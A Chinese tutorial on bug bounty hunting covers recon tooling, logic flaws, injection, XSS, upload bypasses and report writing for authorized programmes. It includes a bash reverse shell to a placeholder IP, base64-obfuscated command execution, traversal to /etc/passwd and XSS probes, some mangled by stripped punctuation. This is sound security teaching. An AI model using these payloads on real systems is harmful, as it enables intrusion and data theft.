1. 项目概述从“挖洞”到“变现”的完整路径如果你对网络安全感兴趣或者经常在技术社区看到“SRC”、“漏洞挖掘”、“白帽子”这些词心里痒痒的但总觉得门槛太高、无从下手那这篇文章就是为你准备的。我干了十多年安全从自己摸索着找第一个XSS漏洞到后来能稳定地在各大SRC平台提交有效报告中间踩过的坑、走过的弯路今天都给你掰开揉碎了讲清楚。所谓“SRC”就是“安全应急响应中心”的简称你可以把它理解为企业设立的“官方悬赏平台”。企业说“来帮我找找我家产品、网站、APP有啥安全问题找到了按规矩给你发奖金。” 这活儿就是漏洞挖掘行话也叫“挖洞”。而“从零入门直达变现”指的就是一条清晰的路径你不需要是科班出身甚至不需要懂太多底层原理起步只要跟着一套被验证过的方法论就能一步步从发现最简单的漏洞开始最终把技术能力转化为实实在在的收益——无论是奖金、荣誉还是职业发展的跳板。这篇文章就是这张地图。2. 核心思路构建可复现的漏洞挖掘工作流很多人觉得漏洞挖掘靠的是灵光一现或者深厚的黑客技术其实不然。对于SRC挖掘尤其是对新手而言它更像是一门“手艺”一套可以标准化、流程化的“工程”。其核心思路是建立一个稳定、高效、可重复的工作流Workflow而不是漫无目的地碰运气。2.1 目标导向从“漫游”到“聚焦”新手最容易犯的错误就是“广撒网”。今天看看A公司的网站明天试试B公司的APP结果每个都浅尝辄止一无所获。正确的思路是“聚焦”。选择一个你感兴趣且合适的SRC平台作为起点深入研究其规则、资产范围和历史漏洞报告。为什么选择聚焦每个SRC的偏好、技术栈、漏洞评级标准都不同。集中研究一个你能更快地摸清它的“脾气”。比如有的SRC对逻辑漏洞特别看重奖金高有的则更关注信息泄露。通过分析其历史漏洞报告很多平台会公开部分案例你能总结出高频漏洞类型和攻击面这比盲目测试效率高十倍。如何选择第一个SRC建议从规则清晰、资产丰富、对新手友好的平台开始。一些大型互联网公司的SRC如腾讯、阿里、字节等虽然竞争激烈但文档齐全漏洞案例多学习资源丰富。一些垂直领域如教育、金融的SRC其资产特点鲜明测试思路相对集中也可能是不错的切入点。2.2 方法论优先资产收集与信息侦察在真正动手测试之前花费70%的时间进行信息收集是资深白帽子和新手的最大区别。你的目标是绘制一张关于目标资产的“全景地图”。子域名枚举这是扩大攻击面的第一步。一个主域名下可能隐藏着几十上百个子域名其中很多可能是开发、测试、老旧的后台系统安全性往往较弱。工具如subfinder,amass,OneForAll是必备的。注意请严格遵守目标SRC的测试范围。通常只允许测试*.example.com这类泛域名而*.aliyun.com或*.aws.amazon.com这类云服务商域名是绝对禁止的。在测试前务必仔细阅读平台的“测试范围”声明。端口与服务探测获取子域名列表后使用nmap或masscan进行端口扫描。发现开放了 80, 443 的Web服务是重点但也要关注 8080, 8443, 7001 等常见中间件端口以及 21, 22, 3306 等可能暴露敏感服务的端口。实操心得不要用默认的激进扫描策略容易被目标防火墙封禁。使用-sS -sV --top-ports 1000 -T3这样的参数组合在速度和隐蔽性之间取得平衡。对于大量资产可以先扫-p 80,443,8080,8443快速定位Web服务。Web应用指纹识别识别出Web服务后立刻使用Wappalyzer浏览器插件或whatweb、EHole等工具识别其技术栈。知道目标用的是 ThinkPHP、Spring Boot、WordPress 还是 Vue.js Node.js能极大地指引你的测试方向。例如ThinkPHP 有历史漏洞Spring Boot 可能暴露 Actuator 端点WordPress 有已知的插件漏洞。目录与文件爬取使用dirsearch,gobuster,ffuf等工具进行目录爆破。目标是发现后台登录入口、备份文件如.zip,.tar.gz,.bak、配置文件如.env,config.php、接口文档如/swagger-ui.html,/api-docs等。避坑技巧使用一个强大的字典至关重要。不要只用工具自带的普通字典可以融合SecLists项目中的大型字典并根据目标技术栈定制例如针对 Java 应用加入/actuator,/heapdump等路径。关联信息挖掘利用 GitHub、网盘搜索、证书透明度日志CT Log等渠道寻找目标公司员工无意中泄露的源代码、API密钥、数据库密码等敏感信息。这步往往能有“惊喜”发现。2.3 工具链思维自动化解放双手漏洞挖掘不是纯手工艺术。高手都善于构建自己的自动化工具链将重复、繁琐的工作交给机器。基础侦察自动化将子域名枚举、端口扫描、HTTP服务存活验证、基础指纹识别写成脚本一键运行自动生成初步报告。漏洞扫描与初筛使用nuclei这类工具。它拥有社区维护的数千个漏洞检测模板POC能快速对目标进行批量、低侵入性的漏洞筛查。发现疑似点后再人工进行深入验证和利用。重要提示切勿使用AWVS,Nessus等商业扫描器对SRC目标进行全盘扫。这属于违规行为会产生大量垃圾流量极易导致你的IP甚至整个ASN被拉黑。nuclei的模板大多经过优化请求量可控更适合SRC环境。信息监控自动化使用github-monitor等工具监控目标相关的新代码提交、关键词泄露。使用waybackurls,gau等工具获取目标的历史URL从中可能找到已下线但未关闭的有趣功能点。3. 核心漏洞类型与实战挖掘解析掌握了工作流我们进入实战环节。下面针对SRC中最常见、最适合新手入门的几类漏洞讲解具体的挖掘思路、测试方法和利用技巧。3.1 业务逻辑漏洞最高价值的“思维游戏”逻辑漏洞不依赖任何技术栈缺陷只源于业务设计或实现时的逻辑错误。它往往危害大、奖金高是体现测试者思维深度的关键。越权访问水平越权用户A能操作用户B的数据。常见于订单ID、用户ID、票据号等参数可被遍历猜测。测试方法登录两个测试账号抓取A操作某个对象如订单/order/view?id1001的请求将ID替换为B的对应对象IDid1002看是否能访问。垂直越权普通用户能执行管理员功能。重点测试后台功能URL是否在前端隐藏但后端未校验权限。通过爬虫或目录爆破发现的管理后台路径直接尝试用普通用户Cookie访问。实操心得关注所有带有数字ID、UUID的请求参数。使用Burp Suite的Intruder模块进行数字递增或字典遍历攻击。对于UUID虽然难以爆破但有时可通过注册多个账号观察其生成规律如时间递增。业务流程绕过支付漏洞修改支付金额如将amount100改为amount0.01、重复利用支付凭证、未校验支付状态直接发货。优惠券/积分漏洞无限领取优惠券、修改优惠券金额或使用条件、积分兑换比例参数篡改。测试方法完整走一遍关键业务流程注册-登录-下单-支付用Burp Suite拦截每一个环节的请求和响应尝试修改每一个可能影响业务状态的参数。特别关注返回包中的状态码status、成功标志success: true以及后续跳转逻辑。条件竞争俗称“抢跑”。当一段代码如库存检查、余额检查存在“检查-使用”的时间窗口并发请求可能绕过限制。经典场景限量优惠券领取、余额提现检查余额提现金额后再扣款。测试工具Burp Suite的Turbo Intruder插件是神器。它可以发送高并发的异步请求模拟竞争条件。将可能存在竞争的请求包放入设置并发线程数为50-100发起攻击观察结果。3.2 注入类漏洞经久不衰的“内功”尽管防护手段日益成熟但注入漏洞SQLi、命令注入、模板注入等依然广泛存在尤其在老旧系统、API接口和内部管理平台中。SQL注入现代注入点不再局限于?id1。重点关注POST请求的JSON参数{user:admin--}、Cookie字段、HTTP Headers如X-Forwarded-For。盲注自动化对于时间盲注或布尔盲注手工测试效率极低。使用sqlmap的--level和--risk参数提高检测强度并配合--tamper脚本绕过WAF。对于JSON格式使用--data指定数据并设置--headersContent-Type: application/json。避坑技巧使用sqlmap前务必在Burp中确认注入点并使用--proxyhttp://127.0.0.1:8080参数让流量经过Burp方便观察和控速。切勿对SRC目标使用--dbs等高风险操作除非规则明确允许。优先使用--batch --smart进行智能检测即可。命令/代码注入常见场景网络设备、运维系统的“Ping测试”、“DNS查询”功能内容管理系统CMS的插件功能参数化的API调用如?cmdls。测试Payload从简单开始; whoami,| id, ps aux,id。逐步尝试反弹Shellbash -c bash -i /dev/tcp/your_ip/port 01需URL编码。绕过技巧空格用${IFS}代替命令用十六进制或Base64编码。例如cat /etc/passwd可编码为echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash。3.3 跨站脚本与跨站请求伪造前端交互的“陷阱”XSS虽然奖金可能不高但却是很好的入门点能帮你理解输入输出和上下文。寻找输入点所有用户可控输入都是怀疑对象搜索框、评论框、个人信息昵称、头像URL、URL参数、Cookie如果可设置。测试Payload根据输出上下文选择。HTML上下文scriptalert(1)/script,img srcx onerroralert(1)。属性上下文 onmouseoveralert(1),scriptalert(1)/script。JavaScript上下文/scriptscriptalert(1)/script,-alert(1)-。进阶盲打XSS当 payload 执行但你看不到弹窗时如后台管理员视图使用盲打平台如xsshs.cn或自建XSS Hunter。Payload 为script srchttp://你的平台地址/记录/script一旦触发平台会收到通知并带回页面信息。CSRF测试关键状态修改操作改密码、转账、添加管理员是否缺少有效的Token或同源校验。用Burp生成CSRF PoC HTML在已登录目标网站的情况下用浏览器打开这个HTML文件看操作是否成功执行。3.4 文件上传与路径遍历通往服务器的“后门”文件上传漏洞绕过前端校验直接抓包修改文件扩展名、Content-Type。绕过黑名单尝试非常见扩展名.phtml,.phps,.jspx、大小写.PHP、点号空格.php.、双扩展名.jpg.php、.htaccess文件攻击配置解析规则。绕过内容检测在文件开头添加图片魔数如GIF89a;或将WebShell代码插入图片EXIF信息。利用解析特性Apache的1.php.jpg如果配置不当Nginx的路径解析漏洞/upload/test.jpg/1.php。实战流程先传一个正常图片确认上传路径和访问URL。然后依次尝试上述绕过方法每次上传后立即尝试访问看是否被解析。路径遍历寻找文件读取、下载功能参数如?file../../etc/passwd,?filename../../../WEB-INF/web.xml。使用../../../../进行深度遍历并尝试编码绕过..%2f..%2f,..%252f..%252f。4. 漏洞报告撰写与提交临门一脚的“艺术”挖到漏洞只是成功了一半一份清晰、专业、合规的报告是获得认可和奖励的关键。4.1 报告的核心要素一份优秀的SRC漏洞报告应包含以下部分缺一不可漏洞标题精炼概括。格式“[目标域名/系统]存在[漏洞类型]导致[造成的影响]”。例如“api.xxx.com接口未授权访问导致大量用户敏感信息泄露”。漏洞等级根据平台标准自评如高、中、低。不确定时宁可就低由平台审核人员定级。漏洞发现时间精确到分钟。目标信息完整的URL、IP、主机名。漏洞描述用文字清晰说明漏洞点、涉及的功能模块。漏洞复现步骤这是报告的灵魂必须做到让审核人员能无脑跟着操作一遍。第一步访问http://target.com/login使用测试账号test1/test123登录。第二步进入“我的订单”页面URL为http://target.com/order?user_id1001。第三步将参数user_id的值修改为1002回车。关键操作加粗第四步页面成功显示用户1002的所有订单信息包括收货地址、手机号等。附上每一步的截图图中用红框圈出关键位置和修改的参数漏洞证明截图视频。截图要完整包含浏览器地址栏和页面关键信息。对于复杂交互漏洞如竞争条件建议录制GIF或短视频。漏洞危害具体说明该漏洞可能导致的直接和间接影响如数据泄露、资金损失、权限提升等。避免空泛的“危害很大”。修复建议给出具体、可操作的修复方案。例如“在对/api/user/orders接口进行查询时后端应校验当前登录用户的会话身份与请求的user_id参数是否匹配而非直接信任前端传入的参数。”4.2 提交前后的注意事项遵守规则再次确认测试行为在规则允许范围内时间、范围、方法。禁止使用自动化扫描器进行DoS测试、禁止对用户数据进行篡改或泄露、禁止进行社会工程学攻击。沟通礼仪在报告沟通中保持专业、礼貌。如果审核人员对漏洞有疑问耐心补充信息。对于“不予受理”或“重复漏洞”的判定可以有理有据地申诉但避免情绪化。一洞一报同一个漏洞点引发的多个问题如一个SQL注入点既能拖库又能getshell尽量合并到一个报告中但要在危害部分阐述清楚。不同域名或系统的相同漏洞应分开提交。5. 进阶之路从新手到高手的思维转变当你能够稳定地发现并提交中低危漏洞后就需要思考如何突破瓶颈挖掘更高价值、更深入的漏洞。5.1 深度信息收集与“攻击面”拓展员工入口挖掘寻找企业的VPN登录页面、OA系统、邮箱登录入口如mail.xxx.com,owa.xxx.com。这些系统往往防护较弱且一旦突破价值极高。可以通过搜索引擎语法site:xxx.com inurl:vpn | login | oa查找。第三方服务与供应链现代应用大量依赖第三方JS库、云存储、CDN、API服务。这些第三方服务的漏洞同样会影响主站。测试方法检查网页源码中引用的外部JS如jquery.min.js的特定漏洞版本、统计代码、客服系统等。使用Subdomain Takeover检查技术确认废弃的子域名是否指向未注销的云服务如 GitHub Pages, AWS S3可能导致被劫持。移动端APP与小程序对APP进行抓包配置手机代理分析其API接口。关注接口的加密、签名机制是否可绕过。小程序则可以通过反编译获取前端代码寻找隐藏接口和逻辑。5.2 漏洞链组合实现“112”的效果单个低危漏洞可能价值有限但将多个漏洞组合起来可能产生高危甚至严重的危害。经典组合拳一个信息泄露漏洞如JS文件泄露内部API地址 一个未授权访问漏洞 直接获取敏感数据。一个XSS漏洞仅Self型 一个CSRF漏洞管理员功能 构造链接让管理员点击从而执行管理员操作如添加后台账号。一个路径遍历读取配置文件 配置文件中的数据库密码 获取数据库权限。思维训练每发现一个漏洞不要立刻提交。停下来想一想这个漏洞获取到的信息如接口地址、参数格式、ID规律能否帮助我找到另一个漏洞这个漏洞造成的权限或影响能否作为下一个漏洞的跳板5.3 关注新兴技术栈与攻击面云原生与容器安全随着K8s、Docker的普及/debug/pprof、/metrics、/actuator等监控端点错误的K8s配置如--anonymous-authtrueDocker Registry的未授权访问都成为新的突破口。API安全现代前后端分离架构下API是主要攻击面。重点测试接口的认证鉴权JWT是否可伪造、参数校验批量操作是否导致越权、业务限频短信轰炸、GraphQL接口的复杂查询拒绝服务等。AI应用安全针对AI模型的提示词注入Prompt Injection、训练数据投毒、模型窃取等开始出现。虽然目前SRC中较少但代表了前沿方向。这条路没有捷径它需要持续的学习、大量的实践和不断的总结反思。最开始可能一周也挖不到一个洞这非常正常。我的建议是把每次测试都当成一次学习过程即使没找到漏洞你也熟悉了一个新的系统架构、一种新的业务逻辑。坚持写测试笔记记录你的思路、用过的Payload、遇到的WAF和绕过方法。慢慢地你会形成自己的“漏洞直觉”看到某个功能脑子里就能自动浮现出几种可能的测试方案。这份攻略为你铺好了从零开始的地图但路上的风景和坎坷需要你自己去经历和征服。安全的世界很大挖洞只是其中有趣的一环保持好奇保持敬畏享受技术带来的乐趣和挑战吧。